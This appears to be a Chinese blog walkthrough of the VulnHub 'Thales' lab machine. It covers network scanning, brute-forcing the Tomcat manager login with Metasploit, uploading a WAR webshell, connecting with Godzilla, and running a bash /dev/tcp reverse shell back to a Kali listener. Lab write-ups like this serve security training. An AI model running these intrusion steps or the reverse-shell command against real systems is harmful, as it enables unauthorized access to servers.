Thales靶机在网络安全教学与实战中的应用与价值

1.下载好该靶机,将桥接模式改为NET网段并启动

https://download.vulnhub.com/thales/Thales.zip

2.借助kali来确定该靶机的IP

复制代码
arp-scan -l
nmap -O 192.168.56.101

3.访问改IP 192.168.56.101

4.点击manager app发现有个登录

使用msf爆破一下

复制代码
msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS 192.168.56.101
run

5.然后进行登录tomcat:role1,在这上传一个war包

6.然后访问这个包

7.用哥斯拉去进行连接

8.然后进行反弹shell

在kali进行监听

在终端运行

复制代码
bash -c 'bash -i>& /dev/tcp/192.168.56.102/8888 0>&1'

回到kali发现监听到

相关推荐
德福危险19 小时前
密码枚举的艺术:靶机练习之midwest
服务器·安全·web安全
cdprinter21 小时前
信刻——安全生产音视频录音录像自动刻录备份归档管理系统
安全·自动化·音视频
jieyu11191 天前
uploads-labs靶场通关(2)
web安全·靶场通关
Forfun_tt1 天前
upload-labs pass-19
web安全·网络安全
缘友一世1 天前
文件上传漏洞和绕过技术
web安全·网络安全·渗透测试·文件上传漏洞·开发安全
嘉里蓝海1 天前
橙色风暴中的安全守卫者——嘉顺达蓝海的危险品运输启示录
安全
Blossom.1181 天前
把AI“刻”进玻璃:基于飞秒激光量子缺陷的随机数生成器与边缘安全实战
人工智能·python·单片机·深度学习·神经网络·安全·机器学习
wanhengidc1 天前
云手机的安全保护措施有哪些?
运维·服务器·安全·游戏·智能手机·云计算
岛屿旅人1 天前
智库报告美国如何打网络战
网络·人工智能·安全·web安全
newxtc1 天前
【广州公共资源交易-注册安全分析报告-无验证方式导致安全隐患】
开发语言·selenium·安全·yolo